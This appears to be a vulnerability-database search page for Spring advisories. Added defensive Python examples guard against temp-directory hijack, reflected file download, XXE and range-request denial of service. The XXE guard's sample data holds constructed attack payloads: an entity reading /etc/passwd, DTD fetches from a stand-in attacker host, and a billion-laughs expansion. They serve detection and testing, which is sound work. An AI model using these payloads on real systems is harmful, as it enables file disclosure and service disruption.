205 matches found
Privilege Escalation
spring-web is vulnerable to privilege escalation. Creating or recreating the temporary storage directory can collide with the directory of another instance, which allows a locally authenticated malicious user to read or modify files being uploaded, or to overwrite arbitrary files with multipart request data...
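The entry above describes a shared, predictable temporary directory that a local user can pre-create or reuse. The check a practitioner would want is to verify the upload directory before trusting it (real directory, not a symlink, owned by the service, no group/other bits) and to create it with an unpredictable name and private mode. The block below is an added example written for this page in Python, not code from spring-web or Spring Framework; the directory name "multipart-tmp", the demo() race simulation and the policy it enforces are assumptions for illustration.

```python
import os
import stat
import tempfile


def verify_private_dir(path):
    """Return a list of problems with ``path`` as a private upload directory.

    An empty list means: it is a real directory (not a symlink), owned by the
    current user, and carries no group/other permission bits, so another local
    account cannot read or replace the multipart files staged inside it.
    """
    problems = []
    st = os.lstat(path)                      # lstat: do not follow a planted symlink
    if stat.S_ISLNK(st.st_mode):
        return ["path is a symlink"]
    if not stat.S_ISDIR(st.st_mode):
        problems.append("path is not a directory")
    if hasattr(os, "geteuid") and st.st_uid != os.geteuid():
        problems.append("owned by uid %d, not the service uid %d" % (st.st_uid, os.geteuid()))
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        problems.append("group/other permission bits set: %o" % stat.S_IMODE(st.st_mode))
    return problems


def unsafe_upload_dir(base, name="multipart-tmp"):
    """The collision-prone pattern: a fixed, predictable name that is simply
    reused if it already exists. Whoever created it first keeps ownership and
    whatever permissions they chose. (Hypothetical name, not Spring's.)"""
    path = os.path.join(base, name)
    os.makedirs(path, exist_ok=True)
    return path


def secure_upload_dir(base):
    """Per-instance directory with an unpredictable name, created mode 0700 by
    mkdtemp, then verified before use so a failure is loud rather than silent."""
    path = tempfile.mkdtemp(prefix="multipart-", dir=base)
    problems = verify_private_dir(path)
    if problems:
        raise RuntimeError("refusing to use %s: %s" % (path, "; ".join(problems)))
    return path


def demo():
    """Simulate the race: a local attacker pre-creates the predictable directory
    world-writable before the service starts. Returns both verification results."""
    base = tempfile.mkdtemp(prefix="demo-base-")          # constructed scratch area
    planted = os.path.join(base, "multipart-tmp")
    os.mkdir(planted)
    os.chmod(planted, 0o777)                              # attacker keeps read/write for everyone
    unsafe = verify_private_dir(unsafe_upload_dir(base))  # silently reuses the planted dir
    secure = verify_private_dir(secure_upload_dir(base))
    return {"unsafe_problems": unsafe, "secure_problems": secure}


if __name__ == "__main__":
    print(demo())
```

The ownership test is skipped on platforms without os.geteuid; on POSIX it is what catches a directory planted by a different local account even when its mode happens to look tight.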
Update Atlassian Platform to 3.5.19 to fix CVE-2018-1000613, CVE-2019-17571 and other vulnerabilities
Update Atlassian Platform from 3.5.17 to 3.5.19. The new platform version brings changes in the following libraries: update com.atlassian.applinks: from 5.4.21 to 5.4.23 update com.atlassian.plugins: from 4.4.10 to 4.4.14 update com.atlassian.sal: from 3.1.2 to 3.1.3 update com.atlassian.streams:...
spring-ws: XML External Entity Injection (XXE) when receiving XML data from untrusted sources
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources...
Reflected File Download (RFD) Attack
spring-web is vulnerable to a Reflected File Download (RFD) attack. An incomplete fix for CVE-2015-5211 allows an attacker to bypass the RFD protection via the jsessionid path parameter...
Vulnerability in the spring-webmvc and spring-webflux modules of the Spring Framework allows attackers to perform cross-site request forgery attacks.
The vulnerability in the spring-webmvc and spring-webflux modules of the Spring Framework stems from a lack of protection against Cross-Site Request Forgery (CSRF) attacks. Exploiting it allows a remote malicious actor to perform CSRF attacks...
springframework: DoS Attack via Range Requests
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controlle...
Insecure version of Spring Web MVC used in Confluence Analytics
Hello! A transitive dependency issue has been found in Confluence Analytics: https://atlassian.sourceclear.io/workspaces/Paaina7/issues/vulnerabilities/26465610 Confluence Analytics has a transitive dependency on the Spring Web MVC library, which has a security bug. The issue can be fixed by...
CVE-2019-3773
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources...
Reflected File Download
spring-web is vulnerable to reflected file download. The filename attribute derived from the user-supplied Content-Disposition header is not validated or sanitized, potentially allowing the response content to be saved and executed as a file by the user's browser...
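Both RFD entries above (the unvalidated filename, and the bypass through a jsessionid path parameter) come down to one decision: what Content-Disposition a response gets when request data can shape the saved file's name or extension. The block below is an added example written for this page in Python; it is not Spring's code and does not reproduce Spring's fix. It generalises the two cases: an application-supplied filename is sanitised, and an extension found anywhere in the last path segment, including inside a ;param=value path parameter, must be on the application's own allow-list or the response is forced to a neutral name. The extension lists, the neutral name f.txt and the path layout are assumptions.

```python
import re
from typing import Optional, Set
from urllib.parse import unquote

# Extensions Windows or a browser may execute or auto-open from a saved download (assumed list).
DANGEROUS_EXTENSIONS = frozenset({
    "bat", "cmd", "com", "exe", "scr", "msi", "hta", "js", "jse", "vbs", "vbe",
    "wsf", "wsh", "ps1", "reg", "jar", "sh", "lnk",
})
# Extensions this hypothetical application legitimately serves; anything else is neutralised.
SAFE_EXTENSIONS = frozenset({"json", "xml", "txt", "csv", "html", "htm", "pdf", "png", "jpg", "gif"})
NEUTRAL_DISPOSITION = 'inline; filename="f.txt"'   # harmless name if the browser saves the body


def extensions_in_path(path: str) -> Set[str]:
    """Every extension a browser might pick up from the last path segment, including any
    hidden inside path parameters: '/api/user;jsessionid=x.bat' yields {'bat'}."""
    last = unquote(path).rsplit("/", 1)[-1]
    exts = set()
    for part in last.split(";"):          # first part is the segment, the rest are path params
        if "." in part:
            exts.add(part.rsplit(".", 1)[-1].lower())
    return exts


def sanitize_filename(name: str) -> str:
    """Reduce a caller-supplied filename to a bare, non-executable basename.
    Returns '' when nothing safe is left."""
    name = unquote(name).replace("\\", "/").rsplit("/", 1)[-1]   # drop directory components
    name = re.sub(r'[\x00-\x1f\x7f"\';<>|*?:]', "", name)         # control chars, quotes, metachars
    name = name.strip(" .")                                        # trailing dots/spaces are ignored by Windows
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if not name or ext in DANGEROUS_EXTENSIONS:
        return ""
    return name


def content_disposition_for(request_path: str, requested_filename: Optional[str] = None) -> Optional[str]:
    """Decide the Content-Disposition header for a response whose body may echo request data.

    - If the application wants a specific download name, it is sanitised first.
    - Otherwise, if the request path (or a path parameter) carries an extension the app
      does not serve, force the neutral name so a saved copy cannot become 'x.bat'.
    - Returns None when no header is needed.
    """
    if requested_filename is not None:
        clean = sanitize_filename(requested_filename)
        return 'attachment; filename="%s"' % clean if clean else NEUTRAL_DISPOSITION
    exts = extensions_in_path(request_path)
    if exts and not exts <= SAFE_EXTENSIONS:
        return NEUTRAL_DISPOSITION
    return None


if __name__ == "__main__":
    for p in ("/api/users.json", "/api/users.bat", "/api/users;jsessionid=x.bat"):
        print(p, "->", content_disposition_for(p))
```

The allow-list is checked against every extension found, not only the one on the real segment, so a path parameter cannot smuggle a second extension past the check; the sanitiser strips the characters that would let a filename break out of the quoted header value.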
Remote Code Execution (RCE)
spring-web is vulnerable to remote code execution (RCE). When it is used with external endpoints, whether or not those endpoints are authenticated, the method HttpInvokerServiceExporter.readRemoteInvocation deserializes untrusted objects if the endpoints are exposed to untrusted...
GHSA-8222-6FC8-MHVF Vulnerability that affects org.springframework.ws:spring-ws and org.springframework.ws:spring-xml
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources...
Vulnerability that affects org.springframework.ws:spring-ws and org.springframework.ws:spring-xml
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources...
XXE
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources...
PT-2019-5717 · Spring · Spring Web Services
Name of the Vulnerable Software and Affected Versions: Spring Web Services versions 2.4.3, 3.0.4, and older unsupported versions. Description: The issue is an improper restriction of XML external entity references, which can lead to XML External Entity Injection (XXE) when receiving XML data...
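The Spring Web Services entries above all describe the same condition: XML from an untrusted source is handed to a parser that will resolve entities and external DTDs. The policy a practitioner applies regardless of parser is to refuse any document that declares entities or references an external DTD before parsing proper begins. The block below is an added example written for this page, not Spring WS code and not its fix; it implements that policy with Python's expat bindings (whose handler callbacks abort parsing when they raise), and runs it over constructed payloads. The sample documents, the attacker.invalid host and the allow_internal_dtd switch are assumptions. Note that expat does not fetch external entities on its own, whereas the JAXP parsers used by Java stacks will unless configured otherwise, which is why the check is applied as an explicit gate.

```python
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised before any entity could be expanded or fetched."""


def check_xml(data, allow_internal_dtd=False):
    """Scan ``data`` (bytes or str) with expat and abort at the first DTD construct that
    could introduce an entity. Returns a small summary for documents that pass."""
    parser = xml.parsers.expat.ParserCreate()
    summary = {"root": None, "elements": 0}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            raise UnsafeXML("external DTD reference in <!DOCTYPE %s>" % name)
        if not allow_internal_dtd:
            raise UnsafeXML("DOCTYPE not permitted for this endpoint")

    def on_entity_decl(name, is_parameter_entity, value, base, system_id, public_id, notation_name):
        kind = "parameter" if is_parameter_entity else "general"
        source = "external (%s)" % system_id if system_id else "internal"
        raise UnsafeXML("%s entity '%s' declared, %s" % (kind, name, source))

    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXML("external entity reference to %r" % system_id)

    def on_start(name, attrs):
        if summary["root"] is None:
            summary["root"] = name
        summary["elements"] += 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl          # covers internal and external, general and parameter
    parser.ExternalEntityRefHandler = on_external_ref  # defence in depth; decls are rejected first
    parser.StartElementHandler = on_start
    parser.Parse(data, True)
    return summary


# Constructed sample payloads for the demonstration (not captured traffic).
SAMPLES = {
    "clean_soap": b'<?xml version="1.0"?>'
                  b'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
                  b'<soap:Body><GetUser><id>42</id></GetUser></soap:Body></soap:Envelope>',
    "classic_xxe": b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
                   b'<r>&xxe;</r>',
    "external_dtd": b'<!DOCTYPE r SYSTEM "http://attacker.invalid/evil.dtd"><r/>',
    "parameter_entity": b'<!DOCTYPE r [<!ENTITY % p SYSTEM "http://attacker.invalid/p.dtd">%p;]><r/>',
    "billion_laughs": b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;&lol;">]>'
                      b'<lolz>&lol2;</lolz>',
    "harmless_internal_dtd": b'<!DOCTYPE r [<!ELEMENT r (#PCDATA)>]><r>ok</r>',
}


def classify(samples=SAMPLES, allow_internal_dtd=False):
    """Run the guard over each sample; map name -> 'ok' or the rejection reason."""
    results = {}
    for name, payload in samples.items():
        try:
            check_xml(payload, allow_internal_dtd=allow_internal_dtd)
            results[name] = "ok"
        except UnsafeXML as exc:
            results[name] = "rejected: %s" % exc
    return results


if __name__ == "__main__":
    for name, verdict in classify().items():
        print("%-22s %s" % (name, verdict))
```

With the default allow_internal_dtd=False any DOCTYPE is refused, which is the setting to use for a web service endpoint; the switch exists only to show that even a permitted internal subset still cannot carry an entity declaration.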
Denial Of Service (DoS)
spring-web is vulnerable to denial of service (DoS). A malicious user can send an HTTP request containing a Range header with overlapping ranges, leading to an error that would crash the service...
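The two range-request entries above (the ResourceHttpRequestHandler DoS and the overlapping-ranges DoS) describe the same failure mode: a Range header that is syntactically valid but abusive, either many ranges or ranges that overlap, so that serving it costs far more than the resource itself. RFC 7233 section 6.1 tells servers to ignore, coalesce or reject such requests. The block below is an added example written for this page in Python, not Spring's HttpRange code; it parses a byte-range header, drops unsatisfiable ranges, and refuses overlapping or excessive lists before any I/O is scheduled. The cap of 100 ranges and the choice of status codes are assumed policy, not values taken from Spring.

```python
from typing import List, Optional, Tuple

MAX_RANGES = 100   # assumed policy cap on byte-range specs per request


def parse_byte_ranges(header: Optional[str], content_length: int) -> Optional[List[Tuple[int, int]]]:
    """Parse a Range header into inclusive (start, end) pairs clamped to the resource.

    Returns None when the header is absent or malformed (serve the whole resource with 200),
    and an empty list when no range is satisfiable (416). Individually unsatisfiable
    ranges are dropped, as RFC 7233 allows.
    """
    if not header or not header.startswith("bytes="):
        return None
    if content_length <= 0:
        return []
    ranges = []
    for spec in header[len("bytes="):].split(","):
        spec = spec.strip()
        if "-" not in spec:
            return None
        first, last = spec.split("-", 1)
        if first == "":                                   # suffix range: the last N bytes
            if not last.isdigit():
                return None
            n = int(last)
            if n == 0:
                continue                                   # unsatisfiable
            ranges.append((max(0, content_length - n), content_length - 1))
        else:
            if not first.isdigit() or (last and not last.isdigit()):
                return None
            start = int(first)
            end = int(last) if last else content_length - 1
            if last and end < start:
                return None                                # syntactically invalid
            if start >= content_length:
                continue                                   # unsatisfiable
            ranges.append((start, min(end, content_length - 1)))
    return ranges


def overlapping(ranges: List[Tuple[int, int]]) -> bool:
    """True if any two ranges share a byte; sorting makes this a single pass."""
    s = sorted(ranges)
    return any(s[i][1] >= s[i + 1][0] for i in range(len(s) - 1))


def decide_range_response(header: Optional[str], content_length: int):
    """Map a Range header to (status, ranges): 200 full body, 206 partial content,
    416 unsatisfiable, or 400 for a well-formed but abusive request."""
    if header and header.startswith("bytes=") and header.count(",") + 1 > MAX_RANGES:
        return 400, None                                   # refuse before parsing an excessive list
    ranges = parse_byte_ranges(header, content_length)
    if ranges is None:
        return 200, None
    if not ranges:
        return 416, None
    if overlapping(ranges):
        return 400, None                                   # the overlapping-ranges DoS case
    return 206, ranges


if __name__ == "__main__":
    for h in ("bytes=0-499, 500-999", "bytes=0-500,400-900,0-999", "bytes=2000-3000"):
        print(h, "->", decide_range_response(h, 1000))
```

The count check runs on the raw header so a request with thousands of ranges is rejected without allocating anything per range; the overlap check catches the case where a small number of ranges still cover the resource many times over.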
ColumnPack:ColumnPack-plugin (=1.0.3), CustomHistory:CustomHistory (>=1.1 <=1.3) +4985 more potentially affected by CVE-2015-3192 via org.springframework:spring-web (>=1.2.1 <=3.2.13.RELEASE)
org.springframework:spring-web MAVEN version =1.2.1, =1.1, =0.0.1, =1.0, =0.0.20, =1.0.0-alpha-1, =1.0, =2.0, =1.1.1, =1.0.2, =1.1.2, =1.2, =1.3 and more Source cves: CVE-2015-3192 Source advisory: OSV:GHSA-6V7W-535J-RQ5M...
am.ik.springmvc:new-controller (>=0.1.0 <=0.2.0), am.ik.woothee:woothee-spring (=1.0.0) +1729 more potentially affected by CVE-2015-3192 via org.springframework:spring-web (>=4.0.0.RELEASE <=4.1.6.RELEASE)
org.springframework:spring-web MAVEN version =4.0.0.RELEASE, =0.1.0, =1.0.0, =1.3.1-RELEASE, =0.0.6, =0.9.0-1, =1.0.0 and more Source cves: CVE-2015-3192 Source advisory: OSV:GHSA-6V7W-535J-RQ5M...
ai.foremast.metrics:foremast-spring-4x-k8s-metrics (>=0.1.6 <=0.2.0), at.porscheinformatik.zanata:zanata-spring (>=1.0.0.RELEASE <=1.1.0.RELEASE) +2978 more potentially affected by CVE-2018-11039 via org.springframework:spring-web (>=4.3.0.RELEASE <=4.3.17.RELEASE)
org.springframework:spring-web MAVEN version =4.3.0.RELEASE, =0.1.6, =1.0.0.RELEASE, =1.6, =1.6, =1.0.10, =0.2.13, =0.2.13, =0.2.13, =0.7, =1.7.2, =1.1.3, =1.1.7 - ch.rasc:wampspring =1.1.2 - ch.rasc:wampspring-security =1.1.2 - ch.rasc:wampspring-session =1.1.2 and more Source cves: CVE-2018-110...